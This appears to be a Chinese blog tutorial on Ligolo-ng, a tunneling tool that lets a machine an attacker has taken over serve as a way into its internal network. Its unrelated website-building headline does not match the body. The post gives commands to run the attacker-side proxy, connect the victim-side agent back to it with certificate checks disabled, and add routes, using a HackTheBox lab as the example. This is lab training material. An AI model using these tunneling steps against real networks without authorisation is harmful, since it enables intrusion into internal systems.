企业官网建设流程全解析

工具简介

• 项目地址：https://github.com/nicocha30/ligolo-ng

Ligolo-ng 是一款开源的、基于 Go 语言开发的内网穿透和代理工具，专为渗透测试和红队行动设计。它通过建立安全的 TLS 隧道，将目标内网的流量代理到攻击者控制的外部服务器，从而实现对目标内部网络的访问。Ligolo-ng 支持多平台（包括 Windows、Linux、macOS 等），具有轻量、高效、易于部署的特点，并提供类似 SOCKS5 的代理功能，可与主流安全工具（如 Nmap、Metasploit、Burp Suite 等）无缝集成。其架构采用客户端-代理（agent-proxy）模式，通信加密且支持自定义证书，兼顾隐蔽性与安全性，是现代红队作业中常用的隧道工具之一。

工具使用

该项目发行的二进制编译文件主要有两个：agent、proxy

简单的说：agent放在受害机上，proxy放在攻击机上

服务端启动（攻击机）

• -selfcert：动态生成自签名证书

.\proxy.exe -selfcert

• 工具默认的监听端口为11601，可见下图

客户端启动（受害机）

• -ignore-cert：忽略TLS证书验证

./agent -connect 服务端IP地址:服务端监听端口（默认11601） -ignore-cert

连接过程

• 客户端发送连接后，服务端收到响应

• 在服务端输入`session`即可显示出受害机agent信息，再回车即可选中

session

操作配置

• 输入`iflist`列出攻击机当前所有网络接口

iflist

• 输入`start`工具将自动配置一个'ligolo'网络接口

start

查看官方手册见路由配置方法

• 手册链接：https://docs.ligolo.ng/Quickstart/

由于我的服务端（攻击机）使用的是Windows系统，因此点击查看该系统路由配置方法

• 重新起一个Powershell或者CMD，执行命令列出系统中所有网络接口的Idx

netsh int ipv4 show interfaces

• 以HackTheBox靶场为例，靶机IP均在10.0.0.0/8网段下，因此我直接添加这一个大段，简单转换后可得以下命令

route add 10.0.0.0 mask 255.0.0.0 0.0.0.0 if 72

• 回到ligolo服务端重新执行`iflist`可见路由被成功添加

• 启动一个HTB靶机，在攻击机可成功访问，原来该IP仅限客户端（受害机）进行访问